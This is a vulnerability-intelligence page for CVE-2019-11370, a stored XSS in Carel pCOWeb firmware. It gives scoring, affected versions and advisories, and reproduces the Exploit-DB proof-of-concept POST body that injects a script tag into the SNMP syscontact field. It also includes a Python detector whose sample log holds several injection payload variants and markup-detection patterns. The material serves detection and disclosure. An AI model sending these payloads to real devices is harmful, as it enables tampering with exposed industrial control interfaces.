CVE-2019-11370
Published: 2019-06-03
Priority: P278 · medium · 5.4 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Flags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 3.98% (89.2th percentile)
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| carel | pcoweb_card_firmware | < b1.2.4 | b1.2.4 |
Detection & IOCs (extracted from sources)
IOC (URL-encoded POST body): command%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
Decoded: command?script:setdb('snmp','syscontact')="><script>alert(123)</script>
sigma
title: Carel pCOWeb Stored XSS CVE-2019-11370
detection:
  keywords:
    - 'alert(document.domain)'
  condition: and
Detection notes:
- Monitor HTTP POST requests to /config/pw_snmp.html targeting the 'syscontact' parameter for script injection payloads (e.g., URL-encoded '<script>' tags or 'alert(' strings).
- The XSS payload is stored in the SNMP 'System contact' field; inspect stored values in that field for embedded script tags or JavaScript event handlers.
- The vulnerability affects Carel pCOWeb firmware versions prior to B1.2.4 only; patched devices running B1.2.4 or later are not affected.
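A worked detection check for the two notes above, added here as an example; it is not code from this page, from Carel, or from the sigma/Nuclei rules the page indexes. It assumes a constructed tab-separated request log (method, path, raw POST body) and the `setdb('snmp','<field>')=<value>` body shape shown in the Exploit-DB entry; the tag and event-handler lists are an assumed, non-exhaustive subset. A keyword match on 'alert(document.domain)' only catches the canned proof-of-concept string, so this check instead URL-decodes the value (including a double-encoded one) and flags any markup written into an SNMP setdb field, whichever field it is; the same scanner can be run over values read back from a device.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample log (not from the page): one request per line,
# tab-separated as METHOD, PATH, RAW_POST_BODY. Line 1 is the Exploit-DB
# payload, line 2 a benign value, line 3 an event-handler variant, line 5
# the same trick against syslocation, line 6 a double-URL-encoded payload.
SAMPLE_LOG = (
    "POST\t/config/pw_snmp.html\tcommand%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29="
    "%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E\n"
    "POST\t/config/pw_snmp.html\tcommand%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29="
    "Building+1+facilities+desk\n"
    "POST\t/config/pw_snmp.html\tcommand%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29="
    "%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E\n"
    "GET\t/config/pw_snmp.html\t\n"
    "POST\t/config/pw_snmp.html\tcommand%3Fscript%3Asetdb%28%27snmp%27%2C%27syslocation%27%29="
    "%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n"
    "POST\t/config/pw_snmp.html\tcommand%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29="
    "%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E\n"
)

# The pCOWeb form writes a field with a key of the form script:setdb('<table>','<field>').
SETDB_RE = re.compile(r"setdb\('(?P<table>[^']*)','(?P<field>[^']*)'\)")

# Markup that has no place in an SNMP sysContact/sysLocation string. The tag
# and handler lists are an assumed, non-exhaustive subset; extend as needed.
MARKUP_RE = re.compile(
    r"<\s*/?\s*script\b"
    r"|<\s*(?:img|svg|iframe|object|embed|body)\b"
    r"|\bon(?:error|load|click|focus|mouseover|animationstart)\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)


def fully_decode(value, max_rounds=3):
    """Undo layered percent-encoding; stops as soon as a round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_stored_value(value):
    """Indicators of markup in a value read from the device or from a request.
    Returns the distinct lower-cased matches, sorted; an empty list when clean."""
    return sorted({m.group(0).lower() for m in MARKUP_RE.finditer(value)})


def detect(log_text):
    """Flag POSTs to /config/pw_snmp.html whose setdb(...) value carries markup."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split("\t")
        if len(parts) < 3:
            continue
        method, path, body = parts[0], parts[1], parts[2]
        if method != "POST" or not path.endswith("/config/pw_snmp.html") or not body:
            continue
        # parse_qsl splits on '&' and the first '=', percent-decoding one layer.
        for key, raw_value in parse_qsl(body, keep_blank_values=True):
            m = SETDB_RE.search(key)
            if m is None:
                continue
            value = fully_decode(raw_value)
            hits = scan_stored_value(value)
            if hits:
                findings.append({
                    "line": lineno,
                    "table": m["table"],
                    "field": m["field"],
                    "indicators": hits,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f['line']}: {f['table']}.{f['field']} <- {f['value']!r} "
              f"({', '.join(f['indicators'])})")
```

Running the block flags lines 1, 3, 5 and 6 of the constructed log and leaves the benign contact string and the GET alone. To audit an already-compromised device, feed the sysContact and sysLocation strings read back over HTTP or SNMP to scan_stored_value().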
CVSS provenance
NVD v3.0: 5.4 MEDIUM, CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
NVD v2.0: 3.5 LOW, AV:N/AC:M/Au:S/C:N/I:P/A:N
VulnCheck: 5.4 MEDIUM
GHSA
GHSA-pfc4-fr5v-j7rh · ghsa_unreviewed · 2022-05-24 · CVE-2019-11370 [MEDIUM] · CWE-79
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
VulnCheck
CVE-2019-11370 [MEDIUM] · carel pcoweb_card_firmware · Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck · 2019 · CVSS 5.4
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
Affected: carel pcoweb_card_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2019-11370; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2019-11370; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Exploit-DB
CVE-2019-11370 Carel pCOWeb < B1.2.1 - Cross-Site Scripting
exploitdb · 2019-05-22
# POST to <Carel pCOWeb Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>
Nuclei
CVE-2019-11370 [MEDIUM] Carel pCOWeb <B1.2.4 - Cross-Site Scripting
nuclei · CVSS 5.4
Strings indexed from the template: Carel pCOWeb, alert(document.domain)
No writeups or analysis indexed.